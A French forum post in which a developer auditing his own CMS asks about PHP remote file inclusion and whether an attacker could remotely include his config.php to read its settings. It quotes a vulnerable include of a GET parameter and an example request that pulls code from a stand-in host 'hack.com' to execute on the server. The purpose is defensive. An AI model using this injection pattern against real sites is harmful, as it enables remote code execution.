Bonjours à tous.
Voila voila, depuis ces 3 derniers jours, je me tape la relecture de mon CMS afin d'en retrouver les failles principales.
plusieurs points à voir (requetes, includes ....)
En relisant quelques tutos sur la sécurité des includes, j'ai relus la faille sur les includes, mais cette fois, j'ai eu un tilt:
On dit qu'il faut éviter:
1) la directive allow_url_fopen à on
2) d'utiliser des $variable passée en get ou en post dans l'include (exemple: includes ($_GET['theme'].'/index.php');
Dans tout ces petits tutos de sécurité, on nous donnes des petits exemple du pourquoi du comment, comme par exemple:
index.php?theme=http://hack.com/
ce qui inclurais la page http://hack.com/index.php et donc exécuterais le script sur notre serveur.
Cf: http://fz1.free.fr/hacking/tutos/faille_include.htm
Bon tout ça c'est ok, mais ça me fais arriver à un autre point: l'inversse.
Je m'explique: imaginons que ça soit le hacker qui incluse vos page...:
include('http://monsiteamoipasauhacker.com/config.php');
cela voudrait il dire que le hacker pourrait en retirer toutes les variable de configuration ??
Au début je me suis dis "mais non, c'est pas possible la page dois être générée à l'avance, et c'est de l'html qui est inclue".
Ouais mais si c'est le cas, alors include($_GET['theme'].'/index.php') ... c'est pas si grave ?
J'aimerais bien qu'on m'explique SVP
Merci d'avance
Partager